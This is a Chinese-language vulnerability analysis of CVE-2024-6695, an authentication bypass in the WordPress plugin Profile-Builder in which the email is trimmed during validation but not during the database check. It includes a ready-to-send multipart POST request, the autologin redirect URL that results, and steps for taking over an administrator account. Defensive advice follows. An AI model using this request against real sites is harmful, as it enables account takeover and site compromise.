细说 wordpress插件 Profile-Builder - CVE-2024-6695分析
字数 1648 2025-08-22 12:22:30
WordPress插件Profile-Builder漏洞分析(CVE-2024-6695)教学文档
漏洞概述
Profile-Builder是WordPress的一个用户资料管理插件,版本3.11.8及之前存在一个认证绕过漏洞(CVE-2024-6695)。该漏洞允许攻击者通过精心构造的电子邮件地址注册并自动登录任意账户,实现权限提升。
漏洞成因分析
核心问题:参数验证不一致
漏洞的根本原因在于插件对用户输入的电子邮件地址处理不一致:
- 前端验证:使用
is_email(trim($request_data['email']))进行验证,即验证的是去除空格后的邮箱 - 后端查询:使用原始未trim的邮箱进行数据库查询
SELECT * FROM {$wpdb->users} WHERE user_email = %s
这种差异导致攻击者可以构造带有前导或后缀空格的邮箱地址绕过检查。
漏洞触发流程
- 攻击者提交带有空格的邮箱(如" admin@example.com")
- 前端验证:
trim(" admin@example.com")→ "admin@example.com"is_email("admin@example.com")返回true,验证通过
- 数据库查询:
- 使用原始值" admin@example.com"查询
- 由于数据库中存储的是"admin@example.com",查询返回空
- 系统认为该邮箱可用,允许注册
- 注册后自动登录机制使用
trim(sanitize_email($_POST['email']))处理邮箱- 查询到"admin@example.com"对应的用户
- 生成nonce并自动登录该账户
漏洞利用条件
- 目标网站安装了Profile-Builder插件(≤3.11.8)
- 网站有使用
[wppb-register]短代码的注册页面 - 后台设置中启用了"注册后自动登录"功能(默认不启用)
- 知道目标邮箱地址
详细利用步骤
1. 准备工作
- 确认目标网站使用Profile-Builder插件
- 找到注册页面(通常包含
[wppb-register]短代码)
2. 构造恶意请求
发送POST请求到注册页面,包含以下关键字段:
POST /register-page/ HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymhHEju6xYKaPwrBh
------WebKitFormBoundarymhHEju6xYKaPwrBh
Content-Disposition: form-data; name="email"
admin@example.com
------WebKitFormBoundarymhHEju6xYKaPwrBh
Content-Disposition: form-data; name="_wp_http_referer"
/register-page/
------WebKitFormBoundarymhHEju6xYKaPwrBh--
注意:邮箱前后包含空格
3. 获取自动登录URL
成功利用后,响应中会包含类似如下的重定向URL:
3;url=http://target.com/register-page/?autologin=true&uid=1&_wpnonce=7f0d2c68db
4. 完成权限提升
访问返回的重定向URL即可自动登录目标账户(admin@example.com)。
技术细节深入
关键代码分析
- 邮箱验证函数 (
front-end/default-fields/email/email.php):
function wppb_check_email_value($message, $field, $request_data, $form_location){
// 使用trim后的数据进行验证
if (isset($request_data['email']) && !is_email(trim($request_data['email']))) {
return __('The email you entered is not a valid email address.', 'profile-builder');
}
// 使用原始数据进行数据库查询
$users = $wpdb->get_results($wpdb->prepare(
"SELECT * FROM {$wpdb->users} WHERE user_email = %s",
$request_data['email']
));
}
- 自动登录机制 (
front-end/class-formbuilder.php):
function wppb_log_in_user($redirect, $redirect_old) {
// 使用trim和sanitize后的邮箱查询用户
$user = get_user_by('email', trim(sanitize_email($_POST['email'])));
// 生成nonce
$nonce = wp_create_nonce('autologin-'. $user->ID .'-'. (int)(time()/60));
}
- Nonce验证 (全局init钩子):
function wppb_autologin_after_registration(){
if(isset($_GET['autologin']) && isset($_GET['uid']) && isset($_REQUEST['_wpnonce'])){
// 验证nonce
if(wp_verify_nonce($_REQUEST['_wpnonce'], 'autologin-'.$uid.'-'.(int)(time()/60))){
wp_set_auth_cookie($uid); // 设置认证cookie
}
}
}
Nonce机制分析
- Nonce格式:
autologin-{user_id}-{timestamp_in_minutes} - 有效期:2分钟(验证当前和前一个时间段的nonce)
- 生成方式:
wp_create_nonce()使用网站密钥和用户会话生成
防御措施
临时解决方案
- 禁用Profile-Builder插件的"注册后自动登录"功能
- 更新到最新版Profile-Builder插件
长期最佳实践
- 统一参数处理:对所有用户输入使用相同的清理和验证逻辑
- 严格类型检查:使用严格比较(===)而非宽松比较(==)
- 输入规范化:尽早规范化用户输入(如自动trim邮箱)
- 防御性编程:假设所有用户输入都是恶意的
漏洞影响评估
- CVSS评分:8.1 (High)
- 影响范围:所有使用Profile-Builder插件且启用自动登录功能的WordPress网站
- 潜在危害:
- 未授权用户获取管理员权限
- 账户接管
- 数据泄露
- 网站完全沦陷